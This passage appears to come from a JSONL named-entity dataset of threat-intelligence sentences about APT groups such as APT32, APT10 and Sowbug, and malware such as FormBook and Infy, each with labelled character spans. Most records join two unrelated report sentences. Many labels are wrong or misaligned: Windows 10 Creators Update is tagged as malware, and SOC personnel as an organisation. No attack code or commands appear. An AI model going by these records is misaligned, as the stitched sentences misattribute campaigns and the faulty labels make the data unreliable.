Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 102, "end": 119, "label": "Organization"}, {"start": 190, "end": 194, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}]} {"text": "This tool has been used by several Chinese-affiliated threat actors , such as APT 27 and APT 40 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 54, "end": 67, "label": "Organization"}, {"start": 78, "end": 84, "label": "Organization"}, {"start": 89, "end": 95, "label": "Organization"}, {"start": 98, "end": 111, "label": "Organization"}, {"start": 277, "end": 287, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}]} {"text": "The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 53, "end": 65, "label": "Organization"}, {"start": 81, "end": 89, "label": "System"}, {"start": 95, "end": 112, "label": "Malware"}, {"start": 127, "end": 134, "label": "Vulnerability"}, {"start": 208, "end": 213, "label": "System"}, {"start": 258, "end": 263, "label": "System"}]} {"text": "The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets . 
Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 27, "end": 30, "label": "System"}, {"start": 35, "end": 41, "label": "System"}, {"start": 195, "end": 213, "label": "Organization"}, {"start": 218, "end": 229, "label": "Organization"}]} {"text": "Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 25, "end": 30, "label": "Organization"}, {"start": 103, "end": 105, "label": "Organization"}, {"start": 177, "end": 183, "label": "Malware"}, {"start": 202, "end": 207, "label": "Organization"}]} {"text": "A second method the threat actor used to maintain access across the compromised assets was through the deployment of the PoisonIvy RAT ( PIVY ) . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 20, "end": 32, "label": "Organization"}, {"start": 121, "end": 134, "label": "System"}, {"start": 137, "end": 141, "label": "System"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 210, "end": 229, "label": "Organization"}, {"start": 232, "end": 249, "label": "Organization"}, {"start": 264, "end": 272, "label": "Organization"}, {"start": 305, "end": 326, "label": "Organization"}]} {"text": "This infamous RAT has been associated with many different Chinese threat actors , including APT10 , APT1 , and DragonOK . 
For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 14, "end": 17, "label": "System"}, {"start": 66, "end": 79, "label": "Organization"}, {"start": 92, "end": 97, "label": "Organization"}, {"start": 100, "end": 104, "label": "Organization"}, {"start": 111, "end": 119, "label": "Organization"}, {"start": 154, "end": 164, "label": "Malware"}, {"start": 191, "end": 203, "label": "Malware"}, {"start": 237, "end": 245, "label": "Organization"}]} {"text": "It is a powerful , multi-featured RAT that lets a threat actor take total control over a machine . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 19, "end": 37, "label": "System"}, {"start": 50, "end": 62, "label": "Organization"}, {"start": 204, "end": 223, "label": "Organization"}, {"start": 232, "end": 253, "label": "Organization"}]} {"text": "In an attempt to hide the contents of the stolen data , the threat actor used winrar to compress and password-protect it . 
Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 60, "end": 72, "label": "Organization"}, {"start": 78, "end": 84, "label": "System"}, {"start": 123, "end": 141, "label": "Organization"}, {"start": 225, "end": 236, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 261, "end": 268, "label": "Malware"}, {"start": 309, "end": 316, "label": "Malware"}, {"start": 317, "end": 324, "label": "Malware"}]} {"text": "The winrar binaries and compressed data were found mostly in the Recycle Bin folder , a TTP that was previously observed in APT10-related attacks , as well as others . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 65, "end": 83, "label": "System"}, {"start": 88, "end": 91, "label": "System"}, {"start": 235, "end": 256, "label": "Organization"}, {"start": 259, "end": 267, "label": "Organization"}, {"start": 270, "end": 287, "label": "Organization"}, {"start": 290, "end": 308, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}, {"start": 339, "end": 362, "label": "Organization"}]} {"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . 
The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": [{"start": 7, "end": 25, "label": "System"}, {"start": 42, "end": 54, "label": "Organization"}, {"start": 64, "end": 85, "label": "Malware"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 176, "end": 193, "label": "Organization"}, {"start": 196, "end": 214, "label": "Organization"}, {"start": 217, "end": 228, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 250, "end": 261, "label": "Organization"}]} {"text": "In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 87, "end": 99, "label": "Organization"}, {"start": 131, "end": 136, "label": "System"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 291, "end": 308, "label": "Organization"}]} {"text": "There have been numerous reports of hTran being used by different Chinese threat actors , including : APT3 , APT27 and DragonOK . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 36, "end": 41, "label": "System"}, {"start": 74, "end": 87, "label": "Organization"}, {"start": 102, "end": 106, "label": "Organization"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 119, "end": 127, "label": "Organization"}, {"start": 201, "end": 209, "label": "Organization"}]} {"text": "The threat actor made some modifications to the original source code of hTran . 
Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 72, "end": 77, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}]} {"text": "The threat actor had a specific pattern of behavior that allowed us to understand their modus operandi : they used one server with the same IP address for multiple operations . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 246, "end": 259, "label": "Organization"}, {"start": 264, "end": 290, "label": "Organization"}, {"start": 420, "end": 428, "label": "Organization"}]} {"text": "There are previous reports of threat actors including APT10 and APT1 using dynamic DNS . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": [{"start": 30, "end": 43, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 64, "end": 68, "label": "Organization"}, {"start": 75, "end": 86, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}]} {"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . 
The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": [{"start": 73, "end": 85, "label": "Organization"}, {"start": 125, "end": 145, "label": "Organization"}, {"start": 173, "end": 177, "label": "Malware"}, {"start": 178, "end": 185, "label": "Malware"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 293, "end": 313, "label": "Organization"}, {"start": 317, "end": 328, "label": "Organization"}, {"start": 363, "end": 373, "label": "System"}]} {"text": "The data exfiltrated by this threat actor , in conjunction with the TTPs and tools used , allowed us to determine with a very high probability that the threat actor behind these malicious operations is backed by a nation state , and is affiliated with China . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges .", "spans": [{"start": 29, "end": 41, "label": "Organization"}, {"start": 152, "end": 164, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}, {"start": 445, "end": 460, "label": "Organization"}]} {"text": "Symantec saw the first evidence of Sowbug-related activity with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . 
As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 143, "label": "System"}, {"start": 307, "end": 324, "label": "Organization"}, {"start": 369, "end": 394, "label": "Organization"}]} {"text": "Symantec saw the first evidence of Sowbug group with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 35, "end": 47, "label": "Organization"}, {"start": 124, "end": 132, "label": "System"}, {"start": 179, "end": 205, "label": "Malware"}, {"start": 241, "end": 261, "label": "Organization"}, {"start": 280, "end": 293, "label": "Organization"}]} {"text": "Symantec has also been able to connect earlier attack campaigns with Sowbug , demonstrating that it has been active since at least early-2015 and may have been operating even earlier . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 271, "end": 284, "label": "Organization"}]} {"text": "To date , Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina , Brazil , Ecuador , Peru , Brunei and Malaysia . 
While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 68, "label": "Organization"}, {"start": 113, "end": 138, "label": "Organization"}, {"start": 238, "end": 251, "label": "Organization"}, {"start": 333, "end": 336, "label": "Indicator"}]} {"text": "For example , in a 2015 attack on one South American foreign ministry , the group appeared to be searching for very specific information . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 76, "end": 81, "label": "Organization"}]} {"text": "The first evidence of its intrusion dated from May 6 , 2015 but activity appeared to have begun in earnest on May 12 . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 169, "end": 186, "label": "Organization"}, {"start": 191, "end": 207, "label": "Organization"}]} {"text": "In total , the attackers maintained a presence on the target 's network for four months between May and September 2015 . 
Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 15, "end": 24, "label": "Organization"}, {"start": 147, "end": 163, "label": "Indicator"}, {"start": 183, "end": 221, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 265, "end": 278, "label": "Organization"}]} {"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 300, "end": 316, "label": "Organization"}]} {"text": "Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . 
NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 20, "end": 34, "label": "Malware"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 134, "end": 157, "label": "Organization"}, {"start": 278, "end": 289, "label": "Malware"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 326, "end": 335, "label": "Organization"}, {"start": 340, "end": 363, "label": "Organization"}]} {"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 300, "end": 323, "label": "Organization"}, {"start": 326, "end": 335, "label": "Organization"}, {"start": 342, "end": 362, "label": "Organization"}, {"start": 384, "end": 404, "label": "Organization"}, {"start": 409, "end": 418, "label": "Organization"}]} {"text": "FireEye has detected more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions . 
The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 47, "end": 53, "label": "Organization"}, {"start": 336, "end": 363, "label": "Organization"}]} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 102, "end": 108, "label": "System"}, {"start": 127, "end": 141, "label": "Organization"}]} {"text": "FormBook OverviewFormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016 . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": [{"start": 0, "end": 25, "label": "System"}, {"start": 221, "end": 265, "label": "Organization"}, {"start": 270, "end": 274, "label": "Organization"}]} {"text": "The malware may inject itself into browser processes and explorer.exe . 
However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 57, "end": 69, "label": "Malware"}, {"start": 96, "end": 102, "label": "System"}, {"start": 116, "end": 130, "label": "Organization"}]} {"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 244, "end": 251, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 339, "end": 353, "label": "Organization"}]} {"text": "Much of the activity was observed in the United States (Figure 11) , and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12) . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": [{"start": 113, "end": 130, "label": "Organization"}, {"start": 338, "end": 347, "label": "Organization"}, {"start": 353, "end": 371, "label": "Organization"}]} {"text": "In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . 
While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": [{"start": 24, "end": 32, "label": "Malware"}, {"start": 85, "end": 93, "label": "Malware"}, {"start": 226, "end": 230, "label": "System"}, {"start": 297, "end": 325, "label": "Organization"}, {"start": 334, "end": 359, "label": "Organization"}]} {"text": "We have associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 145, "end": 155, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}]} {"text": "The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": [{"start": 76, "end": 83, "label": "Organization"}, {"start": 122, "end": 141, "label": "Malware"}, {"start": 273, "end": 286, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}]} {"text": "We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . 
After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 197, "end": 206, "label": "Organization"}, {"start": 216, "end": 234, "label": "Organization"}]} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-0199 , the observed RTF attachments download . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 153, "end": 165, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 232, "end": 244, "label": "Organization"}]} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 257, "end": 278, "label": "Organization"}]} {"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . 
In the latest attack , Donot group is targeting Pakistani businessman working in China", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 164, "end": 175, "label": "Organization"}, {"start": 189, "end": 210, "label": "Organization"}]} {"text": "This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions , consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown .", "spans": [{"start": 254, "end": 263, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 412, "end": 419, "label": "Organization"}, {"start": 432, "end": 452, "label": "Organization"}]} {"text": "In mid-2016 , malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam . 
The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": [{"start": 3, "end": 11, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 60, "end": 65, "label": "Organization"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 242, "end": 261, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 306, "end": 315, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}]} {"text": "In March 2017 , in response to active targeting of FireEye clients , the team launched a Community Protection Event (CPE) \u2013 a coordinated effort between Mandiant incident responders , FireEye as a Service (FaaS) , FireEye iSight Intelligence , and FireEye product engineering \u2013 to protect all clients from APT32 activity . 
Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": [{"start": 51, "end": 58, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 214, "end": 241, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 419, "end": 440, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 465, "end": 484, "label": "Organization"}]} {"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 48, "end": 64, "label": "Malware"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}]} {"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 37, "end": 58, "label": "Malware"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 144, "end": 154, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 172, "end": 184, "label": "Organization"}]} {"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . 
Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 57, "end": 78, "label": "Malware"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}]} {"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 213, "end": 219, "label": "System"}, {"start": 266, "end": 283, "label": "Indicator"}, {"start": 348, "end": 353, "label": "Organization"}]} {"text": "Also in 2014 , APT32 carried out an intrusion against a Western country\u2019s national legislature . 
Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 138, "end": 143, "label": "System"}, {"start": 160, "end": 164, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 210, "end": 216, "label": "System"}]} {"text": "In 2015 , SkyEye Labs , the security research division of the Chinese firm Qihoo 360 , released a report detailing threat actors that were targeting Chinese public and private entities including government agencies , research institutes , maritime agencies , sea construction , and shipping enterprises . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": [{"start": 10, "end": 21, "label": "Organization"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 195, "end": 214, "label": "Organization"}, {"start": 217, "end": 236, "label": "Organization"}, {"start": 239, "end": 256, "label": "Organization"}, {"start": 259, "end": 275, "label": "Organization"}, {"start": 282, "end": 302, "label": "Organization"}, {"start": 311, "end": 322, "label": "Organization"}, {"start": 475, "end": 494, "label": "Organization"}, {"start": 497, "end": 506, "label": "Organization"}, {"start": 513, "end": 523, "label": "Organization"}]} {"text": "In order to track who opened the phishing emails , viewed the links , and downloaded the attachments in real-time , APT32 used cloud-based email analytics software designed for sales organizations . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}, {"start": 259, "end": 268, "label": "Indicator"}, {"start": 272, "end": 311, "label": "Organization"}]} {"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnama's manufacturing , consumer products , and hospitality sectors . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 133, "end": 150, "label": "Organization"}, {"start": 157, "end": 176, "label": "Organization"}, {"start": 205, "end": 221, "label": "Indicator"}, {"start": 241, "end": 279, "label": "Organization"}, {"start": 282, "end": 286, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}]} {"text": "Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 34, "end": 39, "label": "Organization"}, {"start": 158, "end": 164, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 190, "end": 208, "label": "Organization"}]} {"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . 
Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 26, "end": 35, "label": "System"}, {"start": 74, "end": 87, "label": "Organization"}, {"start": 88, "end": 94, "label": "System"}, {"start": 95, "end": 103, "label": "System"}, {"start": 112, "end": 118, "label": "Organization"}, {"start": 129, "end": 136, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}, {"start": 224, "end": 246, "label": "Organization"}, {"start": 257, "end": 266, "label": "Organization"}]} {"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 209, "end": 224, "label": "Organization"}, {"start": 300, "end": 309, "label": "Organization"}]} {"text": "While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . 
The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 157, "end": 172, "label": "Organization"}, {"start": 342, "end": 355, "label": "Organization"}, {"start": 380, "end": 386, "label": "Organization"}, {"start": 391, "end": 408, "label": "Organization"}]} {"text": "While actors from China , Iran , Russia , and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye , APT32 reflects a growing host of new countries that have adopted this dynamic capability . The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 371, "end": 387, "label": "Organization"}, {"start": 429, "end": 447, "label": "Organization"}]} {"text": "Several Mandiant investigations revealed that , after gaining access , APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s Invoke-Obfuscation framework . 
Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 149, "end": 171, "label": "System"}, {"start": 318, "end": 325, "label": "Organization"}, {"start": 410, "end": 416, "label": "Organization"}, {"start": 471, "end": 486, "label": "Organization"}]} {"text": "Furthermore , APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 143, "end": 156, "label": "Organization"}, {"start": 212, "end": 227, "label": "Organization"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 365, "end": 393, "label": "Organization"}]} {"text": "North Korea's Office 39 is involved in activities such as gold smuggling , counterfeiting foreign currency , and even operating restaurants . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": [{"start": 267, "end": 287, "label": "Organization"}]} {"text": "With these details , we will then draw some conclusions about the operators of CARBANAK . 
